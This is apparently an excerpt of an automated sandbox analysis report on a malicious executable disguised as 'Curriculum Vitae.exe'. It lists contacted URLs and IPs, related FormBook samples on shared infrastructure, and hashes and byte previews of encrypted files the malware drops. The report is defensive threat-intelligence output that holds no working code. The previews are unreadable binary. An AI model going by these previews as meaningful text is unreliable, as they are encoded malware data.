                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.chinaen.org/zb_system/script/jquery-2.2.4.min.jsregsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.chinaen.org/lol/202.htmlregsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.chinaen.org/zb_users/theme/yd1125free/script/common.js?v=1.2.4regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.chinaen.org/lol/firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.chinaen.org/lol/197.htmlregsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=regsvr32.exe, 00000006.00000002.3273025695.0000000007F48000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.chinaen.org/lol/203.htmlregsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.chinaen.org/zb_users/theme/yd1125free/style/css/swiper-4.3.3.min.cssregsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=regsvr32.exe, 00000006.00000002.3273025695.0000000007F48000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.chinaen.org/lol/200.htmlregsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.chinaen.org/zb_users/theme/yd1125free/style/images/logo.pngregsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.chinaen.org/firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.chinaen.org/zb_system/login.phpregsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.ecosia.org/newtab/regsvr32.exe, 00000006.00000002.3273025695.0000000007F48000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.zblogcn.com/regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.chinaen.org/zb_users/theme/yd1125free/style/style.min.css?v=1.2.4regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.chinaen.org/lol/201.htmlregsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ac.ecosia.org/autocomplete?q=regsvr32.exe, 00000006.00000002.3273025695.0000000007F48000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.htmlit.com.cn/regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.chinaen.org/lol/204.htmlregsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.chinaen.org/search.php?act=searchfirefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.mediaplug.bizOAIexgManRWDie.exe, 00000007.00000002.3272150093.0000000005258000.00000040.80000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchregsvr32.exe, 00000006.00000002.3273025695.0000000007F48000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.chinaen.org/zb_users/theme/yd1125free/style/css/font-awesome.min.cssregsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.chinaen.org/zb_system/script/c_html_js_add.phpregsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=regsvr32.exe, 00000006.00000002.3273025695.0000000007F48000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.chinaen.org/lol/199.htmlregsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.chinaen.org/lol/196.htmlregsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.chinaen.org/zb_system/script/zblogphp.jsregsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    195.110.124.133
                    		marcoiozia.infoItaly
                    		39729REGISTER-ASITtrue
                    188.114.96.3
                    		www.chinaen.orgEuropean Union
                    		13335CLOUDFLARENETUStrue
                    84.32.84.32
                    		godoggyonbase.onlineLithuania
                    		33922NTT-LT-ASLTtrue
                    66.81.203.200
                    		www.mediaplug.bizVirgin Islands (BRITISH)
                    		40034CONFLUENCE-NETWORK-INCVGtrue

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1501087
                    Start date and time:2024-08-29 12:13:32 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 28s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:7
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:2
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:Curriculum Vitae.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@7/5@5/4
                    EGA Information:
                    • Successful, ratio: 75%
                    HCA Information:
                    • Successful, ratio: 92%
                    • Number of executed functions: 54
                    • Number of non-executed functions: 285
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Report creation exceeded maximum time and may have missing disassembly code information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    06:16:01API Interceptor28x Sleep call for process: regsvr32.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    195.110.124.133Document_pdf.exeGet hashmaliciousFormBookBrowse
                    • www.marcoiozia.info/1a0o/
                    ptsss.exeGet hashmaliciousFormBookBrowse
                    • www.maggimilano.fun/aj6h/
                    z1DOCUMENTINV.exeGet hashmaliciousFormBookBrowse
                    • www.maggimilano.fun/c9b6/
                    #U0423#U0432#U0435#U0434#U043e#U043c#U043b#U0435#U043d#U0438#U0435 #U2116 24357.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.maggimilano.fun/b3tb/
                    rPHOTO09AUG2024.exeGet hashmaliciousFormBookBrowse
                    • www.elettrosistemista.zip/fo8o/
                    00451.exeGet hashmaliciousFormBookBrowse
                    • www.maggimilano.fun/aj6h/
                    Payment advice.exeGet hashmaliciousFormBookBrowse
                    • www.emme4.online/dujn/
                    Quotation-581024.exeGet hashmaliciousFormBookBrowse
                    • www.emme4.online/dujn/
                    QUOTATION.exeGet hashmaliciousFormBookBrowse
                    • www.emme4.online/dujn/
                    QLLafoDdqv.exeGet hashmaliciousFormBookBrowse
                    • www.elettrosistemista.zip/fo8o/
                    188.114.96.3Fordybendes.exeGet hashmaliciousAzorult, GuLoaderBrowse
                    • d4hk.shop/DL341/index.php
                    ORDER_38746_pdf.exeGet hashmaliciousFormBookBrowse
                    • www.begumnasreenbano.com/e8by/
                    QUOTATION_AUGQTRA071244#U00b7PDF.scrGet hashmaliciousUnknownBrowse
                    • filetransfer.io/data-package/zbi9vNYx/download
                    QUOTATION_AUGQTRA071244PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                    • filetransfer.io/data-package/kDY6Kvx6/download
                    PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).batGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                    • www.katasoo.com/7qad/
                    709876765465.exeGet hashmaliciousDBatLoader, FormBookBrowse
                    • www.coinwab.com/kqqj/
                    http://allegro-8888.com/Get hashmaliciousUnknownBrowse
                    • allegro-8888.com/xml/index.html
                    PO_112234525626823775.jsGet hashmaliciousLokibotBrowse
                    • werdotx.shop/Devil/PWS/fre.php
                    nOyswc9ly2.dllGet hashmaliciousUnknownBrowse
                    • web.ad87h92j.com/4/t.bmp
                    pXm5oVO3Go.exeGet hashmaliciousNitolBrowse
                    • web.ad87h92j.com/4/t.bmp

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    www.mediaplug.bizz11SOAAUG2408.exeGet hashmaliciousFormBookBrowse
                    • 66.81.203.200
                    DN.exeGet hashmaliciousFormBookBrowse
                    • 66.81.203.135
                    Filename.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                    • 66.81.203.200

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    NTT-LT-ASLTORDER_38746_pdf.exeGet hashmaliciousFormBookBrowse
                    • 84.32.84.32
                    quotation.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                    • 84.32.84.32
                    Scan_000019921929240724_PDA _ SOA_Payment Reference TR-37827392-2024-08-29.exeGet hashmaliciousFormBookBrowse
                    • 84.32.84.32
                    factura-630.900.exeGet hashmaliciousFormBookBrowse
                    • 84.32.84.32
                    PAGO $630.900.exeGet hashmaliciousFormBookBrowse
                    • 84.32.84.32
                    Payment_Advice.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 84.32.84.32
                    bot.arm5.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                    • 84.32.84.33
                    bot.arm.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                    • 84.32.84.33
                    bot.m68k.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                    • 84.32.84.33
                    bot.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                    • 84.32.84.33
                    REGISTER-ASITDocument_pdf.exeGet hashmaliciousFormBookBrowse
                    • 195.110.124.133
                    ptsss.exeGet hashmaliciousFormBookBrowse
                    • 195.110.124.133
                    z1DOCUMENTINV.exeGet hashmaliciousFormBookBrowse
                    • 195.110.124.133
                    #U0423#U0432#U0435#U0434#U043e#U043c#U043b#U0435#U043d#U0438#U0435 #U2116 24357.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 195.110.124.133
                    z55FACTURADEPROFORMApdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                    • 81.88.57.70
                    Transferencia bancaria.scr.exeGet hashmaliciousFormBookBrowse
                    • 81.88.57.70
                    rPHOTO09AUG2024.exeGet hashmaliciousFormBookBrowse
                    • 195.110.124.133
                    00451.exeGet hashmaliciousFormBookBrowse
                    • 195.110.124.133
                    Payment advice.exeGet hashmaliciousFormBookBrowse
                    • 195.110.124.133
                    Quotation-581024.exeGet hashmaliciousFormBookBrowse
                    • 195.110.124.133
                    CONFLUENCE-NETWORK-INCVGORDER_38746_pdf.exeGet hashmaliciousFormBookBrowse
                    • 208.91.197.39
                    Payment Advice.exeGet hashmaliciousFormBookBrowse
                    • 208.91.197.27
                    z11SOAAUG2408.exeGet hashmaliciousFormBookBrowse
                    • 66.81.203.200
                    COMMERCAIL INVOICE AND AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                    • 208.91.197.27
                    DN.exeGet hashmaliciousFormBookBrowse
                    • 66.81.203.135
                    http://www.empoweryourretirement.comGet hashmaliciousUnknownBrowse
                    • 208.91.196.253
                    DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                    • 208.91.197.27
                    Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                    • 199.191.50.83
                    roundwood.exeGet hashmaliciousSimda StealerBrowse
                    • 199.191.50.83
                    proforma invoice.exeGet hashmaliciousFormBookBrowse
                    • 208.91.197.27
                    CLOUDFLARENETUSFordybendes.exeGet hashmaliciousAzorult, GuLoaderBrowse
                    • 188.114.96.3
                    G_24370-24396_SI2_S25_8658_MPO_SMARTEX_240715.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                    • 172.67.74.152
                    Offer 2024-30496.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 188.114.97.3
                    pagamento.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 188.114.97.3
                    Po#70831.exeGet hashmaliciousAzorultBrowse
                    • 172.67.128.117
                    payment PAGO 2974749647839452.jsGet hashmaliciousUnknownBrowse
                    • 162.159.130.233
                    Document_pdf.exeGet hashmaliciousFormBookBrowse
                    • 104.21.62.58
                    file.exeGet hashmaliciousUnknownBrowse
                    • 172.64.41.3
                    Great Wall Motor Sale Bank_Sift_Copy.Pdf.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                    • 104.26.13.205

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Temp\aut188B.tmp

                    Download File
                    Process:C:\Users\user\Desktop\Curriculum Vitae.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):286208
                    Entropy (8bit):7.993020730439002
                    Encrypted:true
                    SSDEEP:6144:GjBxdypuuq8TPH0NroZyKw+TtQzPIIBSKTZfYB6QY13zFkvvupYj:G1GqVNoop3gL1a3ouu
                    MD5:9FFBC2625813D547E53B556365627908
                    SHA1:A489B79CCCCC3B147AD7346DDE69CA37163BBC8F
                    SHA-256:E7B272E21627C7C321D34F988DDD793C5F0479BDEE1A93EE1A01B836451F79FC
                    SHA-512:9F9CDE9F414242DDD4B9E2FDC77F3097B52E38E40092B627AF33BEAC051FBCA76832EF8BA075853582B61D74EE17583FA9BD811197165FA4DEE8A757E624788F
                    Malicious:false
                    Reputation:low
                    Preview:t....0ZTB...[...o.63..eAN...9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH.BSP8/.ZB.K.s.Iu.r.^Y)t2?-! #%.!2>X_.t (b4',hP,s.ycz9-)'h_OB.BSP60ZT;LK.o"/..37..:3.W..x(^.I...f4%.X...tY%.._S2i"*.FRBH9BSPfuZT.LCFO7.`BSP60ZTB.BDSII2BS.20ZTBMBFRB.-BSP&0ZT"IBFR.H9RSP62ZTDMBFRBH9DSP60ZTBM"BRBJ9BSP60XT..BFBBH)BSP6 ZTRMBFRBH)BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBF|6-A6SP6..PBMRFRB.=BS@60ZTBMBFRBH9BSp60:TBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBM

                    C:\Users\user\AppData\Local\Temp\aut18BA.tmp

                    Download File
                    Process:C:\Users\user\Desktop\Curriculum Vitae.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):43558
                    Entropy (8bit):7.824619090082407
                    Encrypted:false
                    SSDEEP:768:qk6ES00M4qaPKWXSd8AA650W6jXAy0dR6n9uTuEk4LC+Ib1nQvLUyu1:q/ES0P4NyWXyB1v6DAvdYU6zOE1QvYt1
                    MD5:476EE29C5272F2D9605F9AF1C14FB92E
                    SHA1:2091C2BB825DA1F1A523E3841434F303B4867B7B
                    SHA-256:4FE6632A2BFD577BE2453FC069353FB211E59F339BD8EFC07C079699DA186A3E
                    SHA-512:209A38425CF67BCD411F3F02F2EA6BE7E0A81E4A4082A8F8BFA4921291E308CB96101A9C7E620F30935DF72FC97E83724DE7614296966FF98401D1C505096BA6
                    Malicious:false
                    Reputation:low
                    Preview:EA06..P...)3y.:g5.L....6.Pf.Z..gF..&s...kS.L...l.gV..)S9.Fg0....)..3.U.sZ..mW..iS9.Zm2.......6.V.s...%G..).9.2g0....I..3.i'5I......(.9.>m2..)39.*g5.L...e<...f..Jd.mF...9.\..M......6.Uf....oO....u*g0..3 ...IZ......3...6*..)6.Rfs....6.... ..K..)..Ud....(s9..qW..+.i.Vm2.L.5)...$.~4`.X...@.j..mVfsJ..iL..)si.Jm2.M.4y......T..X...G.'..:qJ..h.9.6g5....I..6.V&s...gX...`...yI.3........Ufs....,..L...2m2.L.4..3.?.6...]X.<...6..0.(..m4.M)s9..qY.DfT...A0.o...6...U.....l.P.r.3..s@.`.......%Bg0...T ...(....J\.qM...39......l. ..l..U....t.........:...U....$...T...gH.n........Q*..+9..4Y..3....x.$..R@!..yR..&.0.R..3......y.0.....8J|.qE..@... ...;f..:.6.Sf.j..l..U&..\.oM....J...K....J..4.^R.3....4.I(.`. .,..i.i.Vl.f.r.4...O.6.`..P.............`.VM....$.&...0.$.......#t.K...J...Q@. &r.6.PfsJ$.b....b.6.V@.....6..<.....V."....N...l ...@..*.s.!0...F.#.L.F..U)..3.j...P.-X.e..3...B.H...D.kQ.4&.ZP.=F.M.`$..AT.L..6..g4..g.`-....l..p.b..U.....9N.....p.aA....!2.6.-.|. .uX..(`...

                    C:\Users\user\AppData\Local\Temp\f18641C2

                    Download File
                    Process:C:\Windows\SysWOW64\regsvr32.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\harrowment

                    Download File
                    Process:C:\Users\user\Desktop\Curriculum Vitae.exe
                    File Type:ASCII text, with very long lines (65536), with no line terminators
                    Category:dropped
                    Size (bytes):86022
                    Entropy (8bit):4.179065972475195
                    Encrypted:false
                    SSDEEP:1536:tAykfwPqPE+m+uyC2a5ok2g5m65XBNOWHBhczvUYUOQO9l:Wyw0yrAo25moxNtDEcj2
                    MD5:2B05DA0582676E5BEA8A1FEF1F5BB90A
                    SHA1:9793CF0DAB681D1B260F77AA24BDA2B1E54AAE4D
                    SHA-256:C08BCDF333F033D5D6F96F8D5B64B2E4E899A964CA31E351BE2A5D40DB30C437
                    SHA-512:853B7B84DEB415EA319F821FECA8E9197AD6DDF8927C4BF2A4E28CF19215E1EE41211872F168689E0C260EAD3A2F78C9462BA621EEEEF560D495B97028BC9519
                    Malicious:false
                    Reputation:low
                    Preview:30I78N35P35A38Y62A65T63F38Y31W65S63T63M63V30J32Q30S30R30T30V35S36W35J37V62G38P36X62Z30Y30R30G30M30L30E36D36T38N39T34N35T38D34O62N39I36J35X30X30O30Y30Q30Z30L36F36M38W39T34R64F38L36F62U61B37O32E30M30J30N30E30T30D36Z36U38P39G35W35A38P38W62I38S36D65F30Y30D30N30K30H30E36Y36U38N39C34P35W38X61U62D39R36I35W30S30F30O30S30R30D36Y36N38N39Y34A64L38K63R62B61G36R63R30R30A30Q30H30V30Z36I36J38J39F35M35Y38T65B62X38B33X33C30H30T30I30V30R30Y36X36T38U39P34F35D39H30L62F39L33Q32X30Y30W30E30X30I30V36M36S38T39T34C64W39K32W62Y61B32I65D30C30H30D30M30K30V36Q36V38L39Y35G35V39B34W62F38C36P34P30P30J30B30H30N30P36V36K38M39Y34Q35N39S36B62B39T36T63W30J30H30L30P30O30Y36P36C38J39L34A64Z39U38O62B61H36D63H30R30D30D30B30H30D36Y36N38B39F35S35G39K61E33Y33B63H30O36Y36P38I39S34V35R39T63Y62L39S36B65C30T30X30O30L30W30S36C36O38E39W38C64B34W34C66J66J66R66M66V66L62T61K37M34T30U30B30K30K30B30A36I36F38K39U39J35X34R36E66D66T66D66O66U66X62M38M36Y34O30G30C30K30T30F30V36Q36B38U39Q38C35C34V38Y66W66D66I66W66G66S62I39J36G63X30V30E30T30Q30J3

                    C:\Users\user\AppData\Local\Temp\pensum

                    Download File
                    Process:C:\Users\user\Desktop\Curriculum Vitae.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):286208
                    Entropy (8bit):7.993020730439002
                    Encrypted:true
                    SSDEEP:6144:GjBxdypuuq8TPH0NroZyKw+TtQzPIIBSKTZfYB6QY13zFkvvupYj:G1GqVNoop3gL1a3ouu
                    MD5:9FFBC2625813D547E53B556365627908
                    SHA1:A489B79CCCCC3B147AD7346DDE69CA37163BBC8F
                    SHA-256:E7B272E21627C7C321D34F988DDD793C5F0479BDEE1A93EE1A01B836451F79FC
                    SHA-512:9F9CDE9F414242DDD4B9E2FDC77F3097B52E38E40092B627AF33BEAC051FBCA76832EF8BA075853582B61D74EE17583FA9BD811197165FA4DEE8A757E624788F
                    Malicious:false
                    Reputation:low
